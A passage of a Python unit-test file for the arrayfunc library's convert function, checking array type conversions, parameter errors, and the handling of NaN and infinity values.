with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code f - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_d(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'd'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code d - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code d - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code d - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code d - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code d - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code d - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code d - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code d - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code d - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code d - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code d - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code d - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code d - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_d(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'd'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code d - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code d - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code d - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code d - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code d - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code d - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code d - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_intnonfinite_to_b_from_f(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_f_b_01(self):
"""Test convert floating point nan to array code b from array code f.
"""
data = array.array('f', [math.nan] * 100)
dataout = array.array('b', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_f_b_02(self):
"""Test convert floating point inf to array code b from array code f.
"""
data = array.array('f', [math.inf] * 100)
dataout = array.array('b', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_f_b_03(self):
"""Test convert floating point -inf to array code b from array code f.
"""
data = array.array('f', [-math.inf] * 100)
dataout = array.array('b', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_b_from_d(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_d_b_01(self):
"""Test convert floating point nan to array code b from array code d.
"""
data = array.array('d', [math.nan] * 100)
dataout = array.array('b', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_d_b_02(self):
"""Test convert floating point inf to array code b from array code d.
"""
data = array.array('d', [math.inf] * 100)
dataout = array.array('b', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_d_b_03(self):
"""Test convert floating point -inf to array code b from array code d.
"""
data = array.array('d', [-math.inf] * 100)
dataout = array.array('b', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_B_from_f(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_f_B_01(self):
"""Test convert floating point nan to array code B from array code f.
"""
data = array.array('f', [math.nan] * 100)
dataout = array.array('B', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_f_B_02(self):
"""Test convert floating point inf to array code B from array code f.
"""
data = array.array('f', [math.inf] * 100)
dataout = array.array('B', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_f_B_03(self):
"""Test convert floating point -inf to array code B from array code f.
"""
data = array.array('f', [-math.inf] * 100)
dataout = array.array('B', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_B_from_d(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_d_B_01(self):
"""Test convert floating point nan to array code B from array code d.
"""
data = array.array('d', [math.nan] * 100)
dataout = array.array('B', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_d_B_02(self):
"""Test convert floating point inf to array code B from array code d.
"""
data = array.array('d', [math.inf] * 100)
dataout = array.array('B', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_d_B_03(self):
"""Test convert floating point -inf to array code B from array code d.
"""
data = array.array('d', [-math.inf] * 100)
dataout = array.array('B', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_h_from_f(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_f_h_01(self):
"""Test convert floating point nan to array code h from array code f.
"""
data = array.array('f', [math.nan] * 100)
dataout = array.array('h', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_f_h_02(self):
"""Test convert floating point inf to array code h from array code f.
"""
data = array.array('f', [math.inf] * 100)
dataout = array.array('h', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_f_h_03(self):
"""Test convert floating point -inf to array code h from array code f.
"""
data = array.array('f', [-math.inf] * 100)
dataout = array.array('h', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_h_from_d(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_d_h_01(self):
"""Test convert floating point nan to array code h from array code d.
"""
data = array.array('d', [math.nan] * 100)
dataout = array.array('h', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_d_h_02(self):
"""Test convert floating point inf to array code h from array code d.
"""
data = array.array('d', [math.inf] * 100)
dataout = array.array('h', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_d_h_03(self):
"""Test convert floating point -inf to array code h from array code d.
"""
data = array.array('d', [-math.inf] * 100)
dataout = array.array('h', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_H_from_f(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_f_H_01(self):
"""Test convert floating point nan to array code H from array code f.
"""
data = array.array('f', [math.nan] * 100)
dataout = array.array('H', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_f_H_02(self):
"""Test convert floating point inf to array code H from array code f.
"""
data = array.array('f', [math.inf] * 100)
dataout = array.array('H', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_f_H_03(self):
"""Test convert floating point -inf to array code H from array code f.
"""
data = array.array('f', [-math.inf] * 100)
dataout = array.array('H', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_H_from_d(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_d_H_01(self):
"""Test convert floating point nan to array code H from array code d.
"""
data = array.array('d', [math.nan] * 100)
dataout = array.array('H', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_d_H_02(self):
"""Test convert floating point inf to array code H from array code d.
"""
data = array.array('d', [math.inf] * 100)
dataout = array.array('H', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_d_H_03(self):
"""Test convert floating point -inf to array code H from array code d.
"""
data = array.array('d', [-math.inf] * 100)
dataout = array.array('H', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_i_from_f(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_f_i_01(self):
"""Test convert floating point nan to array code i from array code f.
"""
data = array.array('f', [math.nan] * 100)
dataout = array.array('i', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_f_i_02(self):
"""Test convert floating point inf to array code i from array code f.
"""
data = array.array('f', [math.inf] * 100)
dataout = array.array('i', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_f_i_03(self):
"""Test convert floating point -inf to array code i from array code f.
"""
data = array.array('f', [-math.inf] * 100)
dataout = array.array('i', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_i_from_d(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_d_i_01(self):
"""Test convert floating point nan to array code i from array code d.
"""
data = array.array('d', [math.nan] * 100)
dataout = array.array('i', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_d_i_02(self):
"""Test convert floating point inf to array code i from array code d.
"""
data = array.array('d', [math.inf] * 100)
dataout = array.array('i', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_d_i_03(self):
"""Test convert floating point -inf to array code i from array code d.
"""
data = array.array('d', [-math.inf] * 100)
dataout = array.array('i', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_I_from_f(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_f_I_01(self):
"""Test convert floating point nan to array code I from array code f.
"""
data = array.array('f', [math.nan] * 100)
dataout = array.array('I', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_f_I_02(self):
"""Test convert floating point inf to array code I from array code f.
"""
data = array.array('f', [math.inf] * 100)
dataout = array.array('I', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_f_I_03(self):
"""Test convert floating point -inf to array code I from array code f.
"""
data = array.array('f', [-math.inf] * 100)
dataout = array.array('I', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_I_from_d(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_d_I_01(self):
"""Test convert floating point nan to array code I from array code d.
"""
data = array.array('d', [math.nan] * 100)
dataout = array.array('I', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_d_I_02(self):
"""Test convert floating point inf to array code I from array code d.
"""
data = array.array('d', [math.inf] * 100)
dataout = array.array('I', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_d_I_03(self):
"""Test convert floating point -inf to array code I from array code d.
"""
data = array.array('d', [-math.inf] * 100)
dataout = array.array('I', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_l_from_f(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_f_l_01(self):
"""Test convert floating point nan to array code l from array code f.
"""
data = array.array('f', [math.nan] * 100)
dataout = array.array('l', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_f_l_02(self):
"""Test convert floating point inf to array code l from array code f.
"""
data = array.array('f', [math.inf] * 100)
dataout = array.array('l', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_f_l_03(self):
"""Test convert floating point -inf to array code l from array code f.
"""
data = array.array('f', [-math.inf] * 100)
dataout = array.array('l', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_l_from_d(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_d_l_01(self):
"""Test convert floating point nan to array code l from array code d.
"""
data = array.array('d', [math.nan] * 100)
dataout = array.array('l', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_d_l_02(self):
"""Test convert floating point inf to array code l from array code d.
"""
data = array.array('d', [math.inf] * 100)
dataout = array.array('l', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_d_l_03(self):
"""Test convert floating point -inf to array code l from array code d.
"""
data = array.array('d', [-math.inf] * 100)
dataout = array.array('l', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_L_from_f(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_f_L_01(self):
"""Test convert floating point nan to array code L from array code f.
"""
data = array.array('f', [math.nan] * 100)
dataout = array.array('L', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_f_L_02(self):
"""Test convert floating point inf to array code L from array code f.
"""
data = array.array('f', [math.inf] * 100)
dataout = array.array('L', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_f_L_03(self):
"""Test convert floating point -inf to array code L from array code f.
"""
data = array.array('f', [-math.inf] * 100)
dataout = array.array('L', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_L_from_d(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_d_L_01(self):
"""Test convert floating point nan to array code L from array code d.
"""
data = array.array('d', [math.nan] * 100)
dataout = array.array('L', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_d_L_02(self):
"""Test convert floating point inf to array code L from array code d.
"""
data = array.array('d', [math.inf] * 100)
dataout = array.array('L', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_d_L_03(self):
"""Test convert floating point -inf to array code L from array code d.
"""
data = array.array('d', [-math.inf] * 100)
dataout = array.array('L', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_q_from_f(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_f_q_01(self):
"""Test convert floating point nan to array code q from array code f.
"""
data = array.array('f', [math.nan] * 100)
dataout = array.array('q', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_f_q_02(self):
"""Test convert floating point inf to array code q from array code f.
"""
data = array.array('f', [math.inf] * 100)
dataout = array.array('q', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_f_q_03(self):
"""Test convert floating point -inf to array code q from array code f.
"""
data = array.array('f', [-math.inf] * 100)
dataout = array.array('q', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_q_from_d(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_d_q_01(self):
"""Test convert floating point nan to array code q from array code d.
"""
data = array.array('d', [math.nan] * 100)
dataout = array.array('q', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_d_q_02(self):
"""Test convert floating point inf to array code q from array code d.
"""
data = array.array('d', [math.inf] * 100)
dataout = array.array('q', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_d_q_03(self):
"""Test convert floating point -inf to array code q from array code d.
"""
data = array.array('d', [-math.inf] * 100)
dataout = array.array('q', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_Q_from_f(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_f_Q_01(self):
"""Test convert floating point nan to array code Q from array code f.
"""
data = array.array('f', [math.nan] * 100)
dataout = array.array('Q', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_f_Q_02(self):
"""Test convert floating point inf to array code Q from array code f.
"""
data = array.array('f', [math.inf] * 100)
dataout = array.array('Q', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_f_Q_03(self):
"""Test convert floating point -inf to array code Q from array code f.
"""
data = array.array('f', [-math.inf] * 100)
dataout = array.array('Q', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_intnonfinite_to_Q_from_d(unittest.TestCase):
"""Test convert function for nan, inf, or -inf to integer.
intnonfinitetesttemplate
"""
########################################################
def test_convert_nonfinite_d_Q_01(self):
"""Test convert floating point nan to array code Q from array code d.
"""
data = array.array('d', [math.nan] * 100)
dataout = array.array('Q', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_inf_d_Q_02(self):
"""Test convert floating point inf to array code Q from array code d.
"""
data = array.array('d', [math.inf] * 100)
dataout = array.array('Q', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_ninf_d_Q_03(self):
"""Test convert floating point -inf to array code Q from array code d.
"""
data = array.array('d', [-math.inf] * 100)
dataout = array.array('Q', itertools.repeat(0, len(data)))
with self.assertRaises(OverflowError):
arrayfunc.convert(data, dataout)
##############################################################################
##############################################################################
class convert_floatnonfinite_float(unittest.TestCase):
"""Test convert function for nan, inf, or -inf between floating point types.
floatnonfinitetesttemplate
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
########################################################
def test_convert_nonfinite_f_d_01(self):
"""Test convert floating point nan to array code d from array code f.
"""
data = array.array('f', [math.nan] * 100)
dataout = array.array('d', itertools.repeat(0.0, len(data)))
# There should be no error.
arrayfunc.convert(data, dataout)
self.assertTrue(all(map(math.isnan, dataout)))
########################################################
def test_convert_nonfinite_d_f_02(self):
"""Test convert floating point nan to array code f from array code d.
"""
data = array.array('d', [math.nan] * 100)
dataout = array.array('f', itertools.repeat(0.0, len(data)))
# There should be no error.
arrayfunc.convert(data, dataout)
self.assertTrue(all(map(math.isnan, dataout)))
########################################################
def test_convert_inf_f_d_03(self):
"""Test convert floating point inf to array code d from array code f.
"""
data = array.array('f', [math.inf] * 100)
dataout = array.array('d', itertools.repeat(0.0, len(data)))
compdata = array.array('d', itertools.repeat(math.inf, len(data)))
# There should be no error.
arrayfunc.convert(data, dataout)
self.assertEqual(dataout, compdata)
########################################################
def test_convert_inf_d_f_04(self):
"""Test convert floating point inf to array code f from array code d.
"""
data = array.array('d', [math.inf] * 100)
dataout = array.array('f', itertools.repeat(0.0, len(data)))
compdata = array.array('f', itertools.repeat(math.inf, len(data)))
# There should be no error.
arrayfunc.convert(data, dataout)
self.assertEqual(dataout, compdata)
########################################################
def test_convert_ninf_f_d_05(self):
"""Test convert floating point -inf to array code d from array code f.
"""
data = array.array('f', [-math.inf] * 100)
dataout = array.array('d', itertools.repeat(0.0, len(data)))
compdata = array.array('d', itertools.repeat(-math.inf, len(data)))
# There should be no error.
arrayfunc.convert(data, dataout)
self.assertEqual(dataout, compdata)
########################################################
def test_convert_ninf_d_f_06(self):
"""Test convert floating point -inf to array code f from array code d.
"""
data = array.array('d', [-math.inf] * 100)
dataout = array.array('f', itertools.repeat(0.0, len(data)))
compdata = array.array('f', itertools.repeat(-math.inf, len(data)))
# There should be no error.
arrayfunc.convert(data, dataout)
self.assertEqual(dataout, compdata)
##############################################################################
from arrayfunc import arrayguardbands
##############################################################################
class testlimits:
"""This calculates the test limits, including guard band values
"""
########################################################
def __init__(self):
# Min value for when the source is a 'd' (double) array.
self.source_d_min = {
